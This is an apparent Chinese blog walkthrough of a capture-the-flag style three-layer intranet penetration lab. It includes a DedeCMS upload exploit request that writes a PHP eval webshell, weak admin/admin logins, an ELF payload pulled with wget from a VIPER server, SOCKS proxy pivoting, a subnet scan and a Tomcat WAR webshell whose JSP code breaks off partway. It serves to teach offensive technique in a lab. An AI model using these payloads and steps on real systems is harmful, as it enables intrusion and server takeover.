三层内网渗透

内网拓扑图

在这里插入图片描述

第一层

首先入口网站是一个dedecms
在这里插入图片描述
拿到这个网站先上扫描器
在这里插入图片描述
果然有rebots.txt,访问 http://10.10.9.110//ffffffffllllllllllaaaaaaaagggggg22222222222.txt
flag2
flag{f784234649d7ef161229349d1d76ba8d}
在这里插入图片描述
接着我们想要拿到网站的shell,在漏洞库中发现可以利用dedeCMS后台上传getshell漏洞(CNVD-2018-01221)
参考链接:https://blog.csdn.net/weixin_44897902/article/details/102768536

在这里插入图片描述

/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=<?php @eval($_POST['xxx'])?> 

需要输入账号和密码,可以bp爆破,尝试弱口令,账号密码为:admin/admin
在这里插入图片描述
写入一句话木马成功,访问

/include/taglib/abc.lib.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在根目录找到flag1
拿到shell以后查看内核,和网络情况
在这里插入图片描述
可以发现是双网卡。我们可以利用VIPER上线内网
在自己的vps上搭建VIPER
viper搭建教程:https://www.yuque.com/vipersec/help/rggacz

第二层

在这里插入图片描述
在选择载荷时因为主机内核是ubuntu x86_64,所以选择2处的载荷类型
在这里插入图片描述
生成elf攻击载荷,利用wegt直接上传到tmp目录下(前提是权限足够)
在这里插入图片描述
在tmp目录执行即可
在这里插入图片描述
可以看到主机已经上线
在这里插入图片描述
在这里插入图片描述
点击自动添加路由
在这里插入图片描述
在内网代理处设置socks5代理,在本地开一个全局代理,为后面的渗透做准备
在这里插入图片描述
利用viper自带的扫描器扫一下c段
在这里插入图片描述
在这里插入图片描述
可以看到一共有6个服务,当然也可以在蚁剑上传fsacn扫描c段

./fs8 -h 172.16.20.0/24 -o 2.txt

在这里插入图片描述
访问各个服务首先是172.16.20.38:8080是tomcat,给了地址和网站密码
在这里插入图片描述
在这里插入图片描述
账号为弱口令 admin/admin
显示是tomcat/8.043根据版本号查找漏洞
上传war包,获取webshell:使用蚁剑插件生成webshell,保存为9.jsp,右键添加压缩包,选择压缩包格式为zip格式并保存9.zip,手动修改9.zip为9.war,
上传即可:Webshell地址为:http://172.16.20.38:8080/9/9.jsp

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{
   U(ClassLoader c){
   super(c);}public Class g(byte []b){
   
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值